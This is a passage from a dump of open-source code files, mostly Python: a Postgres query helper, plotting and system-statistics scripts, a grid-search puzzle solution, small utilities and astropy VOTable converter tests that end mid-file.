def selectOne(self, *args, **kwargs):\n return self.select(*args, table=False, **kwargs)\n\n def exists(self, tableName, where={}):\n \"\"\"Execute a select exists() query for a single table.\"\"\"\n\n query = 'Select exists(select 1 from ' + tableName + self.whereClause(where) + ')'\n return self.__execute(query, where.values(), False)\n\n def insert(self, tableName, values):\n \"\"\"Execute an insert one row or several rows to a single table.\"\"\"\n\n if isinstance(values, dict):\n columns = values.keys()\n values = (values,)\n else:\n columns = set(k.lower() for n in values for k in n.keys())\n\n query = 'Insert into ' + tableName + ' (' + ', '.join(columns) + ') values '\n query += ', '.join('(' + ', '.join('%s' if c in v else 'default' for c in columns) + ')' for v in values)\n query += ' returning *'\n\n return self.__execute(query, [v[c] for v in values for c in columns if c in v], len(values) > 1)\n\n def insertIfNotExists(self, tableName, values):\n \"\"\"Execute an insert into select query to insert a single row to a single table.\"\"\"\n\n query = 'Insert into ' + tableName + ' (' + ', '.join(values.keys()) + ')'\n query += ' select ' + ', '.join('%s' for v in values)\n query += ' where not exists(select 1 from ' + tableName + self.whereClause(values) + ')'\n query += ' returning *'\n\n try:\n return self.__execute(query, list(values.values()) * 2, False)\n except NoRow:\n return None\n\n def update(self, tableName, setColumns, where={}, table=True):\n \"\"\"Execute an update for a single table.\"\"\"\n\n assert setColumns\n query = 'Update ' + tableName + ' set ' + ', '.join(k + ' = %s' for k in setColumns.keys())\n query += self.whereClause(where) + ' returning *'\n\n return self.__execute(query, list(setColumns.values()) + list(where.values()), table)\n\n def updateOne(self, *args, **kwargs):\n return self.update(*args, table=False, **kwargs)\n\n def upsert(self, tableName, setColumns, where={}):\n try:\n return self.updateOne(tableName, setColumns, where)\n except NoRow:\n return self.insert(tableName, OrderedCaseInsensitiveDict(list(setColumns.items()) + list(where.items())))\n\n def delete(self, tableName, where={}, table=True):\n \"\"\"Execute a delete for a single table.\"\"\"\n\n query = 'Delete from ' + tableName + self.whereClause(where)\n query += ' returning *'\n\n return self.__execute(query, where.values(), table)\n\n def deleteOne(self, *args, **kwargs):\n return self.delete(*args, table=False, **kwargs)\n\n def whereClause(self, conditions):\n query = ''\n for key, value in conditions.items():\n if not query:\n query += ' where'\n else:\n query += ' and'\n query += ' ' + key\n if isinstance(value, dict):\n query += ' @> %s'\n elif isinstance(value, list):\n query += ' = any (%s)'\n elif value is None:\n query += ' is not distinct from %s'\n else:\n query += ' = %s'\n return query\n\n def truncate(self, tableName):\n \"\"\"Execute a truncate.\"\"\"\n\n return self.__execute('Truncate ' + tableName, [], True)\n\nclass OrderedCaseInsensitiveDictCursor(psycopg2.extras.RealDictCursor):\n def __init__(self, *args, **kwargs):\n kwargs['row_factory'] = OrderedCaseInsensitiveDictRow\n super(psycopg2.extras.RealDictCursor, self).__init__(*args, **kwargs)\n self._prefetch = 0\n\n\nclass OrderedCaseInsensitiveDictRow(psycopg2.extras.RealDictRow, OrderedCaseInsensitiveDict):\n \"\"\"Inspired by the structure on the psycopg2 library.\n See: https://github.com/psycopg/psycopg2/blob/master/lib/extras.py\n \"\"\"\n\n def __init__(self, cursor):\n 
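# NOTE (editor's aside): RealDictRow.__init__ is intentionally not called here; only the ordered, case-insensitive dict base is initialised.\n 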
OrderedCaseInsensitiveDict.__init__(self)\n\n # Required for named cursors\n if cursor.description and not cursor.column_mapping:\n cursor._build_index()\n self._column_mapping = cursor.column_mapping\n\n def __setitem__(self, name, value):\n if type(name) == int:\n name = self._column_mapping[name]\n return OrderedCaseInsensitiveDict.__setitem__(self, name, value)\n\nclass OrderedCaseInsensitiveDictComposite(psycopg2.extras.CompositeCaster, OrderedCaseInsensitiveDict):\n def make(self, values):\n return OrderedCaseInsensitiveDict(zip(self.attnames, values))\n\nclass NoRow(Exception): pass\n\nclass MoreThanOneRow(Exception): pass\n\nclass PostgresError(Exception):\n def __init__(self, psycopgError):\n Exception.__init__(self, psycopgError.diag.message_primary)\n self.__psycopgError = psycopgError\n\n def details(self):\n return dict((attr, getattr(self.__psycopgError.diag, attr))\n for attr in dir(self.__psycopgError.diag)\n if not attr.startswith('__') and getattr(self.__psycopgError.diag, attr) is not None)\n\nclass ProgrammingError(PostgresError): pass\n\nclass IntegrityError(PostgresError): pass\n","repo_name":"tart/tart-mailer","sub_path":"libtart/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":9650,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"40926647716","text":"import numpy as np\nfrom scipy.io import loadmat\nimport matplotlib.pyplot as plt\nimport funcs\nfrom normA import NormA\nimport seaborn as sns\nfrom pandas import DataFrame\nfrom matplotlib.colors import LogNorm\ndef main():\n Options = {'POD': 'PODI','neural_network': True, 'feed_forward_net': True, 'segmented': False, 'per_mode': True, 'N_s': 180, 'm': 30,\n 'N_o': 40, 'x_axis_logged': False, 'No_segments': 20, 'layers': 1, 'chosen_sample': 'log space',\n 'neurons': 1, 'solver': 'adam', 'activation': 'identity', 'ffn_layers': 1, 'ffn_neurons': 16, 'ffn_solver': 'trainbr',\n 'custom_saveload': False, 'save_name': '', 'load_name': ''}\n MIN_NEURONS = 8\n MAX_NEURONS = 32\n MAX_LAYERS = 5\n neurons_arr = np.logspace(int(np.log2(MIN_NEURONS)), int(np.log2(MAX_NEURONS)),num=int(np.log2(MAX_NEURONS))-int(np.log2(MIN_NEURONS))+1, base=2, dtype=int)\n layers_arr = np.arange(1, MAX_LAYERS+1, 1)\n # freq_out = np.linspace(15,15+(Options['N_o']-1)*10, Options['N_o'])\n # freq_out = np.linspace(5, 105, N_o)\n freq_out = np.linspace(15, 5000, Options['N_o'])\n Options['freqout'] = freq_out\n\n\n y_lagr = load_lagrange(Options)\n\n print(layers_arr)\n print(neurons_arr)\n \n scores = np.zeros((len(layers_arr), len(neurons_arr)))\n for i, layers in enumerate(layers_arr):\n Options['ffn_layers'] = layers\n for j, neurons in enumerate(neurons_arr):\n Options['ffn_neurons'] = neurons\n normA_nn = NormA(Options)\n y_nn, _ = normA_nn.load()\n difference = lagr_nn_difference(y_lagr, y_nn, average=True)\n scores[i, j] = difference\n\n # scores = normalise_data(scores)\n # scores = 1- scores\n scores = 1/scores\n print(scores)\n savename = f'l{layers_arr[0]}tol{layers_arr[-1]}_n{neurons_arr[0]}ton{neurons_arr[-1]}_logspace'\n # plots.plot_heatmap_layers_neurons_ylog(layers_arr, neurons_arr, scores, savename)\n\n df = DataFrame(scores.T, index=neurons_arr,columns=layers_arr)\n sns.heatmap(df, cmap=plt.cm.BuPu,cbar=True, norm=LogNorm(),cbar_kws={'label':'Score'})\n plt.xlabel(\"No. of layers\")\n plt.ylabel(\"No. 
of neurons\")\n # plt.yscale('log',basey=2)\n plt.gca().invert_yaxis()\n plt.savefig(f'figures/heatmap_layers_neurons_{savename}.pdf')\n plt.savefig(f'figures/heatmap_layers_neurons_{savename}.eps')\n print(f'saved to figures/heatmap_layers_neurons_{savename}')\n plt.show()\n \n\n\ndef load_lagrange(Options):\n old_m = Options['m']\n Options['neural_network'] = False\n Options['m'] = 20\n normA_lagr = NormA(Options)\n y_lagr, _ = normA_lagr.load()\n Options['neural_network'] = True\n Options['m'] = old_m \n return y_lagr\n\n \ndef normalise_data(diff):\n return (diff - np.nanmin(diff)) / (np.nanmax(diff) - np.nanmin(diff))\n \n \ndef lagr_nn_difference(y1, y2, average=True):\n norm_diff_shields = np.zeros((3, y1[0].shape[0]))\n for i in range(3):\n diff = np.square(y1[i] - y2[i]) / np.nanmax(y1[i])\n norm_diff_shields[i, :]= diff.ravel()\n \n\n if average:\n ret = np.nanmean(norm_diff_shields, axis=None)\n else:\n ret = norm_diff_shields\n return ret\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YashSooriya/magnetoMechanicalSolver","sub_path":"NNpyPlots/plot_heatmap_normAdiff.py","file_name":"plot_heatmap_normAdiff.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72945705652","text":"import os\nimport rrdtool\n\nfrom components.common import *\n\nfrom templates.processes.index import index as OverviewPage\nfrom templates.processes.load import load as LoadAveragePage\nfrom templates.processes.forks import forks as ForkRatePage\n\n\n#\n# The file where we get our data from.\n#\nDATA_SOURCE = \"/proc/loadavg\"\n\n\nclass Processes(StatsComponent):\n \"\"\"Statistics for Process Creation and System Load Averages.\"\"\"\n def __init__(self):\n self.name = \"processes\"\n\n if not os.path.exists(DATA_SOURCE):\n fail(self.name, \"cannot find \\\"%s\\\".\" % DATA_SOURCE)\n raise StatsException(DATA_SOURCE + \" does not exist\")\n \n self.title = \"Processes\"\n self.description = \"system load average and process spawning rates\"\n\n self.data_dir = properties[\"data\"] + \"/\" + self.name\n self.database = self.data_dir + \"/processes.rrd\"\n self.graphs_dir = properties[\"output\"] + \"/\" + self.name\n\n if not os.path.exists(self.data_dir):\n os.makedirs(self.data_dir)\n\n if not os.path.exists(self.graphs_dir):\n os.makedirs(self.graphs_dir)\n os.mkdir(self.graphs_dir + \"/load\")\n os.mkdir(self.graphs_dir + \"/forks\")\n\n if not os.path.exists(self.database):\n #\n # Remember: all \"time\" values are expressed in seconds.\n #\n refresh = properties[\"refresh\"]\n heartbeat = refresh * 2\n rrdtool.create(self.database,\n \"--step\", \"%d\" % refresh,\n \"DS:avg_1min:GAUGE:%d:0:U\" % heartbeat,\n \"DS:avg_5min:GAUGE:%d:0:U\" % heartbeat,\n \"DS:avg_15min:GAUGE:%d:0:U\" % heartbeat,\n \"DS:proc:DERIVE:%d:0:U\" % heartbeat,\n \"RRA:AVERAGE:0.5:1:%d\" % (86400 / refresh), # 1 day of 'refresh' averages\n \"RRA:AVERAGE:0.5:%d:672\" % (900 / refresh), # 7 days of 1/4 hour averages\n \"RRA:AVERAGE:0.5:%d:744\" % (3600 / refresh), # 31 days of 1 hour averages\n \"RRA:AVERAGE:0.5:%d:730\" % (43200 / refresh)) # 365 days of 1/2 day averages\n\n def info(self):\n \"\"\"Return some information about the component,\n as a tuple: (name, title, description)\"\"\"\n return (self.name, self.title, self.description)\n\n def update(self):\n \"\"\"Update the historical data.\"\"\"\n f = open(DATA_SOURCE, \"r\")\n data = f.readline().split()\n f.close()\n\n rrdtool.update(self.database,\n 
\"--template\", \"avg_1min:avg_5min:avg_15min:proc\",\n \"N:%s:%s:%s:%s\" % (data[0], data[1], data[2], data[4]))\n\n \n def make_graphs(self):\n \"\"\"Generate the daily, weekly and monthly graphics.\"\"\"\n height = str(properties[\"height\"])\n width = str(properties[\"width\"])\n refresh = properties[\"refresh\"]\n background = properties[\"background\"]\n border = properties[\"border\"]\n\n for interval in (\"1day\", \"1week\", \"1month\", \"1year\"):\n rrdtool.graph(\"%s/load/graph-%s.png\" % (self.graphs_dir, interval), \n \"--start\", \"-%s\" % interval,\n \"--end\", \"-%d\" % refresh, # because the last data point is still *unknown*\n \"--title\", \"running processes (load average)\",\n \"--lazy\",\n \"--base\", \"1000\",\n \"--units-exponent\", \"0\", # disable automatic scaling of units\n \"--height\", height,\n \"--width\", width,\n \"--lower-limit\", \"0\",\n \"--upper-limit\", \"0.5\",\n \"--imgformat\", \"PNG\",\n \"--vertical-label\", \"processes\",\n \"--color\", \"BACK%s\" % background,\n \"--color\", \"SHADEA%s\" % border,\n \"--color\", \"SHADEB%s\" % border,\n \"DEF:avg_5min=%s:avg_5min:AVERAGE\" % self.database,\n \"AREA:avg_5min#a0df05:5 min average\",\n \"GPRINT:avg_5min:LAST:\\\\: %6.2lf proc (now)\",\n \"GPRINT:avg_5min:MAX:%6.2lf proc (max)\",\n \"GPRINT:avg_5min:AVERAGE:%6.2lf proc (avg)\")\n\n rrdtool.graph(\"%s/forks/graph-%s.png\" % (self.graphs_dir, interval), \n \"--start\", \"-%s\" % interval,\n \"--end\", \"-%d\" % refresh, # because the last data point is still *unknown*\n \"--title\", \"process spawning (forks/sec)\",\n \"--lazy\",\n \"--base\", \"1000\",\n \"--units-exponent\", \"0\", # disable automatic scaling of units\n \"--height\", height,\n \"--width\", width,\n \"--lower-limit\", \"0\",\n \"--upper-limit\", \"0.5\",\n \"--imgformat\", \"PNG\",\n \"--vertical-label\", \"forks/sec\",\n \"--color\", \"BACK%s\" % background,\n \"--color\", \"SHADEA%s\" % background,\n \"--color\", \"SHADEB%s\" % background,\n \"DEF:proc=%s:proc:AVERAGE\" % self.database,\n \"AREA:proc#a0df05:processes\",\n \"GPRINT:proc:LAST:\\\\: %6.2lf forks/sec (now)\",\n \"GPRINT:proc:MAX:%6.2lf forks/sec (max)\",\n \"GPRINT:proc:AVERAGE:%6.2lf forks/sec (avg)\")\n\n def make_html(self):\n \"\"\"Generate the HTML pages.\"\"\"\n template = OverviewPage()\n template_fill(template, self.description)\n template_write(template, self.graphs_dir + \"/index.html\")\n\n template = LoadAveragePage()\n template_fill(template, \"running processes (load average)\")\n template_write(template, self.graphs_dir + \"/load/index.html\")\n\n template = ForkRatePage()\n template_fill(template, \"process spawning rates (forks/sec)\")\n template_write(template, self.graphs_dir + \"/forks/index.html\")\n\n \n# EOF - processes.py\n","repo_name":"carlosefr/quicklook","sub_path":"components/processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73727504052","text":"def bfs(x, y):\r\n # print(x, y)\r\n global min_distance\r\n global shark\r\n global can_eat\r\n d = (abs(shark_d[0] - x) + abs(shark_d[1] - y))\r\n if d > min_distance:\r\n return\r\n\r\n if maps[x][y] < shark and 0 < maps[x][y] < 7:\r\n # print('min_dis : ', min_distance)\r\n # print('can_eat : ', can_eat)\r\n # print()\r\n if not can_eat:\r\n can_eat = [x, y]\r\n min_distance = d\r\n return\r\n else:\r\n if d < min_distance:\r\n can_eat = [x, y]\r\n min_distance = d\r\n\r\n elif d == min_distance:\r\n if 
can_eat[0] > x or (can_eat[0] == x and can_eat[1] > y): # 더 위에 있는 물고기\r\n can_eat = [x, y]\r\n return\r\n # if d < min_distance:\r\n # can_eat = [x, y]\r\n # min_distance = d\r\n # return\r\n # elif d == min_distance:\r\n # if can_eat[0] > x or (can_eat[0] == x and can_eat[1] > y):\r\n # can_eat = [x, y]\r\n # # min_distance = min(min_distance, (abs(shark_d[0] - x) + abs(shark_d[1] - y)))\r\n # print('can_eat : ', can_eat)\r\n # return\r\n\r\n\r\n for k in range(len(dx)):\r\n if 0 <= x+dx[k] < n and 0 <= y+dy[k] < n and 0 <= maps[x+dx[k]][y+dy[k]] < 7:\r\n if maps[x+dx[k]][y+dy[k]] <= shark and visited[x+dx[k]][y+dy[k]] == False:\r\n visited[x+dx[k]][y+dy[k]] = True\r\n bfs(x+dx[k], y+dy[k])\r\n visited[x+dx[k]][y+dy[k]] = False\r\n\r\n\r\n\r\n\r\nn = int(input())\r\nmaps = []\r\nfishes = []\r\n# visited = []\r\nfor _ in range(8):\r\n temp = []\r\n fishes.append(temp)\r\n\r\ndx, dy = [-1, 0, 1, 0], [0, 1, 0, -1]\r\nshark = 2\r\nshark_d = [0, 0]\r\nmove = 0\r\nfor i in range(n):\r\n temp = list(map(int, input().split()))\r\n for j in range(len(temp)):\r\n if temp[j] == 9:\r\n shark_d = [i, j]\r\n maps.append(temp)\r\neat_fishes = 0\r\nwhile True:\r\n can_eat = []\r\n min_distance = 20*20\r\n visited = []\r\n for _ in range(n):\r\n visited.append([False] * n)\r\n\r\n visited[shark_d[0]][shark_d[1]] = True\r\n\r\n bfs(shark_d[0], shark_d[1])\r\n\r\n if not can_eat:\r\n break\r\n print(can_eat)\r\n\r\n # print('shark_d : ', shark_d)\r\n # visited[can_eat[0]][can_eat[1]] = True\r\n move += (abs(can_eat[0] - shark_d[0]) + abs(can_eat[1]-shark_d[1]))\r\n maps[shark_d[0]][shark_d[1]] = 0\r\n shark_d = [can_eat[0], can_eat[1]]\r\n eat_fishes += 1\r\n if shark == eat_fishes:\r\n # print('shark += 1!')\r\n shark += 1\r\n # print('shark : ',shark)\r\n eat_fishes = 0\r\n maps[can_eat[0]][can_eat[1]] = 0\r\n for i in range(n):\r\n print(maps[i])\r\n # print()\r\n # print('move : ',move)\r\n # print('shark_d : ',shark_d)\r\n print('shark : ',shark)\r\n print('move : ',move)\r\nprint(move)\r\n # print(can_eat)\r\n # print(min_distance)\r\n\r\n\r\n# while True:\r\n# can_eat = []\r\n# for i in range(n):\r\n# for j in range(n):\r\n# if 0 < maps[i][j] < 7 and maps[i][j] <= shark:\r\n# can_eat.append([abs(shark_d[0] - i) + abs(shark_d[1] - j), i, j])\r\n#\r\n# print(sorted(can_eat))\r\n\r\n # min_distance = 20\r\n # while q:\r\n # x, y = q[0][0], q[0][1]\r\n # for k in range(len(dx)):\r\n # if 0 <= x+dx[k] < n and 0 <= y+dy[k] < n:\r\n #\r\n\r\n # can_eat = []\r\n # for fish in fishes:\r\n # if fish:\r\n # can_eat.append([abs(fish[0], fish[1]]))\r\n\r\n\r\n\r\n# print(fishes)\r\n","repo_name":"eprj453/algorithm","sub_path":"PYTHON/BAEKJOON/16236_아기상어.py","file_name":"16236_아기상어.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39795989512","text":"#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom read import *\nfrom graph import *\nfrom graph_window import *\nfrom browse_graph import *\n\ndef main(path, showGraph = False):\n\tresults = []\n\tstr = \"\"\n\twindow = None\n\ttry:\n\t\trules, facts, queries = read_run(path)\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn\n\tgraph = Graph(rules)\n\tif not graph.loop:\n\t\tgraph.init(facts)\n\t\tif showGraph:\n\t\t\twindow = GraphShow(graph.getGraph())\n\t\tresults = browse(graph.matrice, graph.liste, graph.invDictionnaire)\n\t\tif queries:\n\t\t\tfor i, x in enumerate(queries): \n\t\t\t\tfor y, z in 
enumerate(graph.invDictionnaire):\n\t\t\t\t\tif z == x:\n\t\t\t\t\t\tstr = \"result of {} is {}\".format(x, bool(results[y]))\n\t\t\t\tprint(str) if str else print(\"result of {} is {}\".format(x, False))\n\t\t\t\tstr = \"\"\n\t\tif window is not None:\n\t\t\twindow.loop()\n\telse:\n\t\tprint(\"error graph loop\")\n\nif __name__ == '__main__':\n\tif len(sys.argv) > 1:\n\t\tfor path in sys.argv[1:]:\n\t\t\tif path != \"-g\":\n\t\t\t\tmain(path, \"-g\" in sys.argv)\n\telse:\n\t\tprint(\"error arguments\")\n","repo_name":"DimitriBischoff/xpertSys","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70593917492","text":"import os\nimport sys\n\nin_fn = sys.argv[1]\nout_fn = sys.argv[2]\n\nfin = open(in_fn, 'r')\nfout = open(out_fn, 'w')\n\nres = dict()\ndef add(d):\n global res\n l = d.split('/')\n cur_res = res\n for i in l:\n if i not in cur_res.keys():\n cur_res[i] = dict()\n cur_res = cur_res[i]\n\ndata_list = []\nfor item in fin.readlines():\n data = item.rstrip().split()[-1]\n data_list.append(data)\n add(data)\n\ncur_id = 0\ndef traverse(n, d, cur_name):\n global cur_id\n cur_id += 1\n\n if cur_name == None:\n cur_cur_name = n\n else:\n cur_cur_name = cur_name + '/' + n\n\n assert cur_cur_name in data_list, cur_cur_name\n\n if len(d.keys()) == 0:\n fout.write('%d %s leaf\\n' % (cur_id, cur_cur_name))\n else:\n fout.write('%d %s subcomponents\\n' % (cur_id, cur_cur_name))\n for item in d.keys():\n traverse(item, d[item], cur_cur_name)\n\nassert len(res.keys()) == 1\nroot = res.keys()[0]\ntraverse(root, res[root], None)\n","repo_name":"daerduoCarey/partnet_seg_exps","sub_path":"stats/merging_hierarchy_mapping/process_merging_tmp2.py","file_name":"process_merging_tmp2.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"5323451129","text":"animals = ['tiger', 'elephant', 'snake', 'shark']\n\n\n'''\nPython runs code from top line to bottom line.\nIn the same line, python runs from left to right.\nHere python notices, it needs to append something at the end of the animals list.\nThen python tries figuring out what it should append, it notices it is another function call.\nSo append function pauses first.\nPython will first call animals.pop(0), 'tiger' is popped out, returned as the value to be appended.\nThen append function resumes.\n'''\nanimals.append(animals.pop(0))\n\n'''\nit equals to:\npopped_animal = animals.pop(0)\nanimals.append(popped_animal)\n'''\n\nprint(animals) # ['elephant', 'snake', 'shark', 'tiger']","repo_name":"Coding-PIGGY/PythonClass03","sub_path":"program2/python_0063_nested_method_call.py","file_name":"python_0063_nested_method_call.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15196628151","text":"#!/usr/bin/env python\nfrom urllib import urlopen\nimport json\n\ndef getnextbuses(stop):\n\n f = urlopen('http://countdown.tfl.gov.uk/stopBoard/%s' % stop)\n d = json.load(f)\n\n next = {}\n\n for bus in d['arrivals']:\n if bus['routeId'] not in next and not bus['isCancelled']:\n next[bus['routeId']] = bus\n return next\n\nwest = getnextbuses('76309')\neast = getnextbuses('48630')\n\ndef wait_key(bus):\n wait, _, unit = bus['estimatedWait'].partition(' ')\n if wait == 'due':\n wait = 0\n elif unit == 'min':\n wait = 
int(wait)\n return wait, bus['routeId']\n\nwest = sorted(west.values(), key=wait_key)\neast = sorted(east.values(), key=wait_key)\n\nwestmsg = ', '.join('%s in %s' % (b['routeId'], b['estimatedWait'].replace(' ', '')) for b in west)\neastmsg = ', '.join('%s in %s' % (b['routeId'], b['estimatedWait'].replace(' ', '')) for b in east)\n\nprint ('Going west: %s; Going east: %s' % (westmsg, eastmsg))\n","repo_name":"londonhackspace/irccat-commands","sub_path":"nextbus.py","file_name":"nextbus.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"18588688481","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport io\n\n# THIRD-PARTY\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_array_equal\n\n# LOCAL\nfrom astropy.io.votable import converters, exceptions, tree\nfrom astropy.io.votable.table import parse_single_table\nfrom astropy.utils.data import get_pkg_data_filename\n\n\ndef test_invalid_arraysize():\n with pytest.raises(exceptions.E13):\n field = tree.Field(None, name=\"broken\", datatype=\"char\", arraysize=\"foo\")\n converters.get_converter(field)\n\n\ndef test_oversize_char():\n config = {\"verify\": \"exception\"}\n with pytest.warns(exceptions.W47) as w:\n field = tree.Field(None, name=\"c\", datatype=\"char\", config=config)\n c = converters.get_converter(field, config=config)\n assert len(w) == 1\n\n with pytest.warns(exceptions.W46) as w:\n c.parse(\"XXX\")\n assert len(w) == 1\n\n\ndef test_char_mask():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", arraysize=\"1\", datatype=\"char\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.output(\"Foo\", True) == \"\"\n\n\ndef test_oversize_unicode():\n config = {\"verify\": \"exception\"}\n with pytest.warns(exceptions.W46) as w:\n field = tree.Field(\n None, name=\"c2\", datatype=\"unicodeChar\", arraysize=\"1\", config=config\n )\n c = converters.get_converter(field, config=config)\n c.parse(\"XXX\")\n assert len(w) == 1\n\n\ndef test_unicode_mask():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", arraysize=\"1\", datatype=\"unicodeChar\", config=config\n )\n c = converters.get_converter(field, config=config)\n assert c.output(\"Foo\", True) == \"\"\n\n\ndef test_unicode_as_char():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"unicode_in_char\", datatype=\"char\", arraysize=\"*\", config=config\n )\n c = converters.get_converter(field, config=config)\n\n # Test parsing.\n c.parse(\"XYZ\") # ASCII succeeds\n with pytest.warns(\n exceptions.W55,\n match=(\n r'FIELD \\(unicode_in_char\\) has datatype=\"char\" but contains non-ASCII'\n r\" value\"\n ),\n ):\n c.parse(\"zła\") # non-ASCII\n\n # Test output.\n c.output(\"XYZ\", False) # ASCII str succeeds\n c.output(b\"XYZ\", False) # ASCII bytes succeeds\n value = \"zła\"\n value_bytes = value.encode(\"utf-8\")\n with pytest.warns(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c.output(value, False) # non-ASCII str raises\n with pytest.warns(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c.output(value_bytes, False) # non-ASCII bytes raises\n\n\ndef test_unicode_as_char_binary():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(\n None, name=\"unicode_in_char\", datatype=\"char\", arraysize=\"*\", config=config\n )\n c = converters.get_converter(field, 
config=config)\n c._binoutput_var(\"abc\", False) # ASCII succeeds\n with pytest.raises(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c._binoutput_var(\"zła\", False)\n\n field = tree.Field(\n None, name=\"unicode_in_char\", datatype=\"char\", arraysize=\"3\", config=config\n )\n c = converters.get_converter(field, config=config)\n c._binoutput_fixed(\"xyz\", False)\n with pytest.raises(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c._binoutput_fixed(\"zła\", False)\n\n\ndef test_wrong_number_of_elements():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"int\", arraysize=\"2x3*\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E02):\n c.parse(\"2 3 4 5 6\")\n\n\ndef test_float_mask():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"float\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.parse(\"\") == (c.null, True)\n with pytest.raises(ValueError):\n c.parse(\"null\")\n\n\ndef test_float_mask_permissive():\n config = {\"verify\": \"ignore\"}\n field = tree.Field(None, name=\"c\", datatype=\"float\", config=config)\n\n # config needs to be also passed into parse() to work.\n # https://github.com/astropy/astropy/issues/8775\n c = converters.get_converter(field, config=config)\n assert c.parse(\"null\", config=config) == (c.null, True)\n\n\ndef test_double_array():\n config = {\"verify\": \"exception\", \"version_1_3_or_later\": True}\n field = tree.Field(None, name=\"c\", datatype=\"double\", arraysize=\"3\", config=config)\n data = (1.0, 2.0, 3.0)\n c = converters.get_converter(field, config=config)\n assert c.output(1.0, False) == \"1\"\n assert c.output(1.0, [False, False]) == \"1\"\n assert c.output(data, False) == \"1 2 3\"\n assert c.output(data, [False, False, False]) == \"1 2 3\"\n assert c.output(data, [False, False, True]) == \"1 2 NaN\"\n assert c.output(data, [False, False]) == \"1 2\"\n\n a = c.parse(\"1 2 3\", config=config)\n assert_array_equal(a[0], data)\n assert_array_equal(a[1], False)\n\n with pytest.raises(exceptions.E02):\n c.parse(\"1\", config=config)\n\n with pytest.raises(AttributeError), pytest.warns(exceptions.E02):\n c.parse(\"1\")\n\n with pytest.raises(exceptions.E02):\n c.parse(\"2 3 4 5 6\", config=config)\n\n with pytest.warns(exceptions.E02):\n a = c.parse(\"2 3 4 5 6\")\n\n assert_array_equal(a[0], [2, 3, 4])\n assert_array_equal(a[1], False)\n\n\ndef test_complex_array_vararray():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"floatComplex\", arraysize=\"2x3*\", config=config\n )\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E02):\n c.parse(\"2 3 4 5 6\")\n\n\ndef test_complex_array_vararray2():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"floatComplex\", arraysize=\"2x3*\", config=config\n )\n c = converters.get_converter(field, config=config)\n x = c.parse(\"\")\n assert len(x[0]) == 0\n\n\ndef test_complex_array_vararray3():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"doubleComplex\", arraysize=\"2x3*\", config=config\n )\n c = converters.get_converter(field, config=config)\n x = c.parse(\"1 2 3 4 5 6 7 8 9 10 11 12\")\n assert len(x) == 2\n assert np.all(x[0][0][0] == complex(1, 2))\n\n\ndef test_complex_vararray():\n config = {\"verify\": \"exception\"}\n field = 
tree.Field(\n None, name=\"c\", datatype=\"doubleComplex\", arraysize=\"*\", config=config\n )\n c = converters.get_converter(field, config=config)\n x = c.parse(\"1 2 3 4\")\n assert len(x) == 2\n assert x[0][0] == complex(1, 2)\n\n\ndef test_complex():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"doubleComplex\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E03):\n c.parse(\"1 2 3\")\n\n\ndef test_bit():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"bit\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E04):\n c.parse(\"T\")\n\n\ndef test_bit_mask():\n config = {\"verify\": \"exception\"}\n with pytest.warns(exceptions.W39) as w:\n field = tree.Field(None, name=\"c\", datatype=\"bit\", config=config)\n c = converters.get_converter(field, config=config)\n c.output(True, True)\n assert len(w) == 1\n\n\ndef test_boolean():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"boolean\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E05):\n c.parse(\"YES\")\n\n\ndef test_boolean_array():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"boolean\", arraysize=\"*\", config=config)\n c = converters.get_converter(field, config=config)\n r, mask = c.parse(\"TRUE FALSE T F 0 1\")\n assert_array_equal(r, 